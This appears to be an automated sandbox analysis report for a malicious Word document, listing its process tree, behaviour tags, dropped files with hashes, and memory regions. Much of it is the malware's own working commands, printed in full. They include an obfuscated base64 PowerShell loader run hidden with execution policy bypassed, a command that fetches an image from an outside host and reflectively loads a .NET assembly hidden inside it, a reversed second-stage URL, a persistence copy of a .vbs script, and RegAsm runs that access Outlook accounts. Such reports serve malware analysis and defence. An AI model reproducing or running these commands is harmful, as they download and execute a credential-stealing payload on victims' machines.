gTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreSwBJDgTreFcDgTreSwDgTrevDgTreHcDgTreawDgTrevDgTreHDgTreDgTrecDgTreBtDgTreGEDgTreeDgTreDgTrevDgTreDYDgTreNQDgTrexDgTreC4DgTreNwDgTre3DgTreDEDgTreLgDgTre2DgTreDQDgTreLgDgTre4DgTreDkDgTreMQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreYwBvDgTreHDgTreDgTreZQBsDgTreGEDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.KIWK/wk/ppmax/651.771.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'copela','RegAsm',''))} }"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\copela.vbs5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"5⤵
-
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"5⤵
-
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"5⤵
-
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\rccijxvv"6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\bwhskpgocqs"6⤵
- Accesses Microsoft Outlook accounts
-
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mqnldirqqykpff"6⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD53b51b6782e203883b843f6ead6cc603a
SHA12966137b5a2ea0f0f003d4e0b6d915c52f8f3317
SHA256ebcf78a6023d71b325cda19575cc097e0d589ddffa4b1d0d494402c212f96eca
SHA5123ceff6c93dcd288ff96058b268cfc28a097813788f818fac15d12fa75fa449220d6d7be77e88e3371c387d4d3cbbd827803b1d4135961979472c256fdfe162cc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
304B
MD5202a71eed268686804984821697cacf4
SHA193217dc75db21cb155fff8d45cb84017b393f153
SHA25653ef2e2e1d4edcd89d954cd53adfa01faf8c75d7545e540e1b7f111ee306ba9e
SHA512e593011774061dc0062b579f65ebcb51e9eddbaf04236a452851b200adf414bdfe304ff0f8a84cb3ed878c21b60fb800c3bf021696eee7997551771db47eb5db
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{49FF3FB5-BD5B-4080-9280-546449A0CBE0}.FSDFilesize
128KB
MD56b6292d54c25ae78589e622a168dd57f
SHA1d87d7250e3d6aebe5cfe7b05aa47275abc0cc5f9
SHA256d2d343f0d2f22440f77faff78bd0acffea8431fe78d3068d48beabc2d1fbe9f5
SHA51297af53c43ba4c43ff8a89d1ee39a70505c52cce6bcf8801ae75e9973af8351bb60f29b20d4690b476cc36813676b5b110f298c35cde488963de1be093e113f04
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSDFilesize
128KB
MD51e36b217701407a90777091ce9c14929
SHA12afdd4a61a76be6e56e1932f23fcdc06be2add75
SHA2566fd610206507aca6f0fd3dcef04176fb8c6d779f2fe47785134e20985db65d02
SHA512ca071e9967e2e60121a1ac60a0e6612a7ae5d4a4bd4792f869d0c62b302a261b52c0474f7f1ae9986bc06feebb24f364ab35675bccf8a7be3df9b2b17620ba0e
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{AC20C9E1-CD9F-459C-89F4-153F4585B2AB}.FSDFilesize
128KB
MD5b16b0389daa9a15d570f992fd2c53b44
SHA1e46aab9f2d69f38b76a680c59d62907255af918c
SHA25604ea24f5a423a23925837052f21a6bac39350d7b8073d6cee1e107904fb5bbe4
SHA512cf468957b4c2d476b847b4db86b79f75ae2a36b5c5d975cf55e6d87cc0ff3164c5ea483de6dfac6fc617a2b4a2ce1cf9b499a2b4be44704d553c4833719b0a8d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\lionisthekingofjunglewhoruletheentirejungletounderstandhowpowerfulkingofjungleheisattitudeismakingentirethinggreattounderstand___lionkingrulethejunglefors[1].docFilesize
33KB
MD5b03fb70c3be411363c911037b610df82
SHA173a641e3b46dffa65c6d720119da0af40e7bfbc8
SHA256e137f8e51aa73d7a046106a61237d7cbec7e0552607784ac8e62fdb0f245027b
SHA512655bed1ea5b2b8d37524f091ca4a3ed834abefba67ee80d2b3f4fa648c6d750da8a4c6e8ffe07d55b4ea0f5ea52dc94b684c6da7a56eff3be95d984c85c22e4c
-
C:\Users\Admin\AppData\Local\Temp\Cab4AA7.tmpFilesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
C:\Users\Admin\AppData\Local\Temp\Tar4AB9.tmpFilesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
C:\Users\Admin\AppData\Local\Temp\Tar4B9A.tmpFilesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
C:\Users\Admin\AppData\Local\Temp\rccijxvvFilesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Local\Temp\{F387F356-10C2-4799-962F-99623685C2F7}Filesize
128KB
MD5f05891c90822b73ace63e2849d4112d9
SHA14f23e766f805936291078f46424e9698bd0456ec
SHA256b2f4d096880ff47f9456d8d64ab6cdbfca327c5ce1efb11ac6b5a2a12204eea0
SHA51283abfdb624aba38db5f6a764c7517c1da98020b1f8b6cfd08e68c68750c77a332b007aa5c1efd613cf60fce6f2712b6c5ce0cffadffb7cb450e35aea072957c5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotmFilesize
20KB
MD540fe0aa3cdcb7f90613601362facfde2
SHA16c3942f07a44624b21e59cf60c7c37c416d4113f
SHA2562049140a7cca45fb00e47a5fb2b640b7a60020991e6db8df9837e65fafee910f
SHA5120c0581bf196e0792dc4ad4b49fa3b00df706b7a26db5a4e554c6e70ec51102fb7b617f792917722a293873a232c29ffc1cfef5b04ed8a0c3a77dbc9f181d7dc2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\XZLVGR85.txtFilesize
71B
MD50056bb9c343a3bbb906769e43bf16f1e
SHA12f65d03cc922df6269a9edb47fffa245bf3dd9f9
SHA25684c81ecd4f350d34b1dd60689e1a8e18656d4712d83f2b62a19cc41fc235cc4c
SHA51202d14a0c844ee846872bb3f7ca3aedaa8562b48d55a7076d2d56eae71ab3d7f5b5dc7fe7d25d4fd045aa09f7688a135188053275f48e807595ecf26a942e056b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD57fa23109af828583c0636ee967f9dfc4
SHA1d940a42702ce8974a9f9036eaddb7fca41996547
SHA2563596473a52ea627c45368e9f0a18e48c453fd0d7cb2b4717db307bc4be28bc37
SHA512dd87d4ce32bdaebfc1f361f37b22f9f7f63888073f6f64340ec544273033e719aac7eb2e143bee23c90072c3918a142eafc9294bd9cea1ee03207ff9a6b14822
-
C:\Users\Admin\AppData\Roaming\thejunglewithnewlionkingimages.vbsFilesize
153KB
MD57fd5b9ec5e17bfeb939278b7643fcc45
SHA1e8ee4fed6a9df750724f7c53b55a9fa98f8cf56c
SHA256a6779a530ca44a702ab0e1fc97f7e9f2b2ab9bc3b7e3cd7c5cef65335fe3e89d
SHA51289b8e135fc36025281a7327a000da0e97cbff5d950dccf0e32f1dd47e641f56564053700d6ed149ecb4d30e074d88ca0db4b7fd5bde1984bce6dd70e14baec8a
-
memory/1200-228-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/1200-226-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/1200-229-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/2524-0-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2524-1-0x000000007299D000-0x00000000729A8000-memory.dmpFilesize
44KB
-
memory/2524-283-0x000000007299D000-0x00000000729A8000-memory.dmpFilesize
44KB
-
memory/2524-9-0x0000000000470000-0x0000000000472000-memory.dmpFilesize
8KB
-
memory/2524-193-0x000000007299D000-0x00000000729A8000-memory.dmpFilesize
44KB
-
memory/2664-6-0x000000007299D000-0x00000000729A8000-memory.dmpFilesize
44KB
-
memory/2664-4-0x000000002FB11000-0x000000002FB12000-memory.dmpFilesize
4KB
-
memory/2664-278-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2664-279-0x000000007299D000-0x00000000729A8000-memory.dmpFilesize
44KB
-
memory/2664-8-0x0000000002E90000-0x0000000002E92000-memory.dmpFilesize
8KB
-
memory/2664-214-0x000000007299D000-0x00000000729A8000-memory.dmpFilesize
44KB
-
memory/2908-231-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/2908-233-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/2908-223-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/2912-225-0x0000000000400000-0x0000000000462000-memory.dmpFilesize
392KB
-
memory/2912-222-0x0000000000400000-0x0000000000462000-memory.dmpFilesize
392KB
-
memory/2912-232-0x0000000000400000-0x0000000000462000-memory.dmpFilesize
392KB
-
memory/2972-220-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-211-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-219-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-217-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-216-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-215-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-196-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-198-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-202-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-204-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-206-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-208-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-210-0x000000007EFDE000-0x000000007EFDF000-memory.dmpFilesize
4KB
-
memory/2972-218-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-238-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-246-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-245-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-253-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-254-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-213-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-212-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-200-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-194-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-288-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-289-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-294-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2972-295-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB